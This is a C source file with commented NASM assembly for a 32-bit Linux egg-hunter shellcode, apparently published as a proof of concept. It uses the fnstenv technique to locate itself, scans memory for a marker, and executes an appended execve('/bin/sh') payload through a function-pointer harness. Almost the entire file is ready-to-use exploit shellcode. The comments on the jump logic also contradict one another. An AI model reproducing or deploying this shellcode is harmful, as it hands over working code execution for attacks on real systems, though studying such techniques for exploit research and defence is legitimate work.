/*
;author: Filippo "zinzloun" Bersani
;date: 25/11/2016
;version 1.0
;purpose: different approach with fnstenv technique, changed the usual pattern to find the egg mark
;X86 Assembly/NASM Syntax
;tested on: Linux OpenSuse001 2.6.34-12-desktop 32bit
; Linux ubuntu 3.13.0-100-generic #147~precise1-Ubuntu 32bit
global _start
section .text
_start:
fldz ;with this 2 instructions...
fnstenv [esp-0xc] ;set the entry point of my egg (_start)
pop esi ;get the entry point addr...
lea esi,[esi+24] ;the trick: move to pointer @ the last byte of this egg hunter
mov edx, dword 0x65676760 ;a dumm value..
rol edx, 0x4 ;...to get the real egg mark: 56767606
find_egg:
inc esi ;scan the next section of memory after this code
cmp [esi], edx ;check if we have found the egg...
jz find_egg ;loop
call esi ;egg found (zero flag is set), jump to the address to exec the shell code
*/
#include<stdio.h>
#include<string.h>
unsigned char egg_hunter[] = \
"\xd9\xee\xd9\x74\x24\xf4\x5e\x8d\x76\x18\xba\x60\x67\x67\x65\xc1\xc2\x04\x46\x39\x16\x74\xfb\xff\xd6";
unsigned char shell_code[] = \
"\x06\x76\x76\x56" // egg id reversed
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"; // POC: /bin/bash
main()
{
printf("Egg hunter length: %d\n", strlen(egg_hunter));
printf("Total length: %d\n", strlen(egg_hunter)+strlen(shell_code));
int (*ret)() = (int(*)())egg_hunter;
ret();
}